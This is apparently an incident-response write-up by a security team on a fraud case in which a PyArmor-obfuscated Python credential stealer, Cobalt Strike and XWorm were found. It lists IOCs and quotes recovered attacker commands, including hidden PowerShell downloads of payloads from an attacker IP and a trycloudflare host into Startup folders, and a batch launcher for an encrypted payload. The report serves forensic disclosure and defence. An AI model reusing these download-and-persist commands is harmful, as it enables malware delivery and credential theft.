Content
Key Findings
- The SECUINFRA Falcon Team discovered an unknown Python malware during a fraud investigation
- The threat actors made heavy use of obfuscation and disposable infrastructure
- In addition to the custom malware off-the-shelf offensive tools like CobaltStrike were used
Introduction
Alertness and vigilance are crucial in cybersecurity. When repeating this truism, most of us think about social engineering attacks and educating the user how to recognize a phishing mail or a scam call. However, an attentive user can also provide valuable insights on a more technical aspect.
A recent incident response case was started, when the user noticed „strange black windows” on the desktop and took screenshots of them. This was accompanied by PayPal transfers from the user’s account, not authorized by the user.
Figure 1: Screenshot captured by the victim, Console output hints at payload decoding and execution
Evidently, a script was run on the computer. The output should have been suppressed with the “echo off” command. Due to a problem in the script, the command was preceded with strange characters, rendering the command inexecutable. Because the screenshots were preserved, we can tell that, apparently, some kind of decoding action and injection took place.
Investigating the compromised client
We further investigated the computer by running the THOR Scanner, which gave us ample evidence to gain further understanding of the compromise.
The EventTraceLog BootPerfDiagLogger.etl contained numerous entries THOR extracted for further analysis. They were showing the following commandline:
CommandLine: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c “$ProgressPreference=’SilentlyContinue’; try { iwr ‘http://43.156.63[.]124/svchoss.exe’ -OutFile ‘C:\Users\admin\AppData\Local\Temp\svchoss.exe’ -ErrorAction Stop; exit 0 } catch { exit 1 }”
This code uses PowerShell, to download the file “svchoss.exe” from the IP address 43.156.63[.]124 and store it in a Temp directory. THOR recognized this filename as homomorphic abuse i.e.: It tried to resemble svchost.exe to fly under the radar.
The IP address it is downloaded from is part of the Autonomous System AS 132203, with the label “Tencent Building, Kejizhongyi Avenue”, implicating Chinese Company Tencent in the attack. The IP address has been linked with numerous recent attacks.
Tencent is not only well-known Chinese multimedia company, due to its location, it is a popular place to host C2 infrastructure, especially for Chinese threat actors.
Furthermore, THOR pointed us to a range of suspicious .bat and .vbs files:
C:\Users\admin\AppData\Roaming\nuil.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rech.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.vbs
The corresponding events had timestamps of the same day as the screenshots.
Memory Dump Analysis
We followed these results up with an analysis of the memory dump we obtained from the customer. Using Volatility 3, we started with the usual modules.
Pstree, psxview, dlllist, ldr_modules, suspended_threads and cmdscan. Unfortunately, not to much avail. We did find a suspended explorer Thread with TID 8812. This could be related to the incident, as indicated in the screenshot, however it was a weak lead.
Running Strings64.exe on the memory dump, searching for strings with more than 5 characters, yielded more than 2 gigabytes of strings.
A string search for the following IOCs we so far had obtained from THOR:
- svchoss
- python
- 43.156.63.124
- esae.vbs
- nuil.bat
- 12.bat
- esae.bat
- rech.bat
- we.bin
- a.txt
- x.txt
- xro.py
- SystemCache25
Yielded over 5000 results. It was clear, we had to narrow this down. Hits like
- Wikipedia.txt
- Nvida.txt
- index.txt
were removed
Immediately conspicuous were the lines
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c $ProgressPreference=’SilentlyContinue’; try { iwr ‘http://43.156.63[.]124/svchoss.exe’ -OutFile ‘C:\Users\admin\AppData\Local\Temp\svchoss.exe’ -ErrorAction Stop; exit 0 } catch { exit 1 }
HostApplication=powershell -WindowStyle Hidden -c iwr ‘http://43.156.63[.]124/esae.vbs’ -OutFile “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\esae.vbs”
HostApplication=powershell -Command Invoke-WebRequest -Uri ‘https://syracuse-seeks-wilson-row.trycloudflare[.]com/of/extracted/12.bat’ -OutFile ‘C:\Users\admin\AppData\Local\Temp\12.bat’
HostApplication=powershell -Command Invoke-WebRequest -Uri ‘https://syracuse-seeks-wilson-row.trycloudflare[.]com/of/extracted/rech.bat’ -OutFile ‘C:\Users\admin\AppData\Local\Temp\rech.bat’
http://msedge.b.tlu.dl.delivery.mp.microsoft[.]com/filestreamingservice/files\rech.bat’
set DIR=%LOCALAPPDATA%\Microsoft\SystemCache25
if exist “%DIR%\xro.py” (
if exist “%DIR%\we.bin” (
if exist “%DIR%\x.txt” (
python xro.py -i vue.bin -k o.txt
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Copy-Item ‘\\syracuse-seeks-wilson-row.trycloudflare[.]com@SSL\davwwwroot\nuil.bat’ ‘C:\Users\admin\AppData\Roaming\nuil.bat’
We did not only confirm the presence of the screenshotted code, but we also generated further IOC and confirmed the maliciousness of the .bat and .vbs files found by THOR. The code indicates that the malicious actor deployed a python installation to the directory %LOCALAPPDATA%\Microsoft\SystemCache25.
The host syracuse-seeks-wilson-row.trycloudflare[.]com did no longer resolve at the time of the investigation. The domain trycloudflare[.]com is legit and part of cloudflare.
msedge.b.tlu.dl.delivery.mp.microsoft[.]com is hosted by Fastly.Inc. The record was last updated on the day of the incident. The URL gave a 403 error, when we tried downloading the .bat file. The domain is belongs to Microsoft. Given the nature of this domain, it is most likely a red-hering for investigators to stumble across, not an actual second stage. The cloudflare domain is part of an ongoing trend among threat-actors, to use legit cloud services for C2 and payload delivery.
Furthermore, we were able to extract pristine examples of the screenshotted code from process memory:
@echo off
set DIR=%LOCALAPPDATA%\Microsoft\SystemCache25
if exist “%DIR%\python.exe” (
if exist “%DIR%\xro.py” (
if exist “%DIR%\we.bin” (
if exist “%DIR%\x.txt” (
cd /d “%DIR%”
python xro.py -i we.bin -k a.txt
)
)
)
Unfortunately, it was not clearly associated with one specific process.
Seaching for known filenames in process handles and in filenames, gave us some hits for
\Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25
\Users\admin\AppData\Local\Microsoft\SystemCache25
And even \Users\admin\AppData\Local\Microsoft\SystemCache25\python.exe
However, the only process still running with a handle to the SystemCache25 folder were two instances of explorer.exe. The processes associated with the files SystemCache25 and python.exe were already terminated when the image was taken.
The following filenames were identified as well, giving us further insight into the python installation in SystemCache25:
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\python3.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\python.exe
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_zstd.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_lzma.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_bz2.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\vcruntime140.dll
Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25\python315.dll
admin@file:///C:/Users/admin/AppData/Local/Microsoft/SystemCache25/x.txt
\Device\HarddiskVolume3\Users\admin\AppData\Local\Microsoft\SystemCache25
At this point, we would have normally started investigating artifacts from the system’s hard drive. Unfortunately, it was not possible to acquire a triage or an image from the system’s hard drive. Instead, we pivoted off the IP 43.156.63[.]124 that we found as a string in memory. We were able to identify and pull some of the payloads hosted there:
vs.exe
a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217
some kind of shellcode loader?
012.exe
7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1
XWorm RAT v5.6
2.4.exe
3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a
HTran Tunneling Tool
02.08.2022.exe
40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52
Cobalt Strike Beacon
svchoss.exe
3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58
PyInstaller Malware
esae.vbs was unfortunately not among these samples.
Additionally, multiple services such as an FTP, MySQL and CobaltStrike Team Server are hosted on this system.
Abuse.ch Threatfox lists multiple records of TCP Ports associated with CS and Empire activity:
Running 02.08.2022.exe through Sentinel-one’s Cobalt Strike Parser confirmed that this is a Cobalt Strike Beacon. The IP adress for the C2 Server is identical to the address where the beacon is hosted.
With svchoss.exe at least being eponymous with the file downloaded to the compromised computer, we focused further investigations on this file. The file was known to VirusTotal as of December 05th 2025, with a score of 41/71 engines detecting it as malicious. https://www.virustotal.com/gui/file/3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58/details
We found several strings inside the .exe file refering to Python and cryptography modules of Python. VirusTotal also showed access to several files in
- C:\Users\<USER>\AppData\Local\Chromium\User Data\AutofillStates\
- C:\Users\<USER>\AppData\Local\48e7a6ba7f72710ae085ed2aae203bf1\<USER>@DESKTOP-ET51AJO_en-US\Wallets\Edge_Wallet\Edge_Exodus\
- C:\Users\<USER>\AppData\Local\48e7a6ba7f72710ae085ed2aae203bf1\<USER>@DESKTOP-ET51AJO_en-US\Browsers\Mozilla\Firefox\
among others. This is indicative, that this is indeed a credential stealer.
We proceeded to extract the content from this file with the tool pyinstxtractor-ng.
The script identified the python version as 314 and the following possible entrypoints:
- pyiboot01_bootstrap.py
- pyi_rth_inspect.py
- pyi_rth_pkgutil.pyc
- pyi_rth_multiprocessing.pyc
- pyi_rth_setuptools.pyc
- test_expert_silent_temp.pyc
The following files were extracted:
The extraction of PYZ.pyz failed. Further files of notice were:
- python314.dll
- the folder pyarmor_runtime_011117
The python314.dll was present to confuse analysis tools with a wrong version number. The usage of pyarmor was implied from the presence of the related folder.
The file test_expert_silent_temp.pyc was immediately suspicious, as it is not a regular python file and we tried to decompile it with uncompyle6 this file, as well as all the other files had the unknown magic number 3627. We replaced it with A7 0D 0D 0A for Python 3.11 (3495). After this, the extraction still failed which as expected with pyarmor being present.
So far, we discovered the following techniques of obfuscation:
- wrong python version number
- different filename (test_expert_silent_temp.pyc)
- wrong magic byte
- pyarmor
Conclusion
Our investigation confirmed the malicious presence on the computer and generated further IOC. THOR proved to be a great help in this, giving us an initial pivot point and strings to search in the system’s memory. Without a full system triage, we could not completely reconstruct the incident and establish the relations between the various datapoints.
We could not reconstruct the initial access vector. Given that it was a regular endpoint that got infected, it is most likely that it included some kind of social engineering. A malicious web-download, or a malicious e-mail are the most probable scenarios.
Indicators of Compromise
Host-based artifacts
File Paths
%USERPROFILE%\AppData\Local\Temp\svchoss.exe
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\python.exe
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\we.bin
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\a.txt
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\x.txt
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\python3.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_zstd.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_lzma.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_bz2.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\libffi-8.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\_ctypes.pyd
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\vcruntime140.dll
%USERPROFILE%\AppData\Local\Microsoft\SystemCache25\python315.dll
C:\Users\admin\AppData\Roaming\nuil.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rech.bat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esae.vbs
Hashsums
a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217
7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1
3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a
40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52
3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58
Network-based artifacts
Domains
https://syracuse-seeks-wilson-row.trycloudflare[.]com
IP addresses
43.156.63[.]124
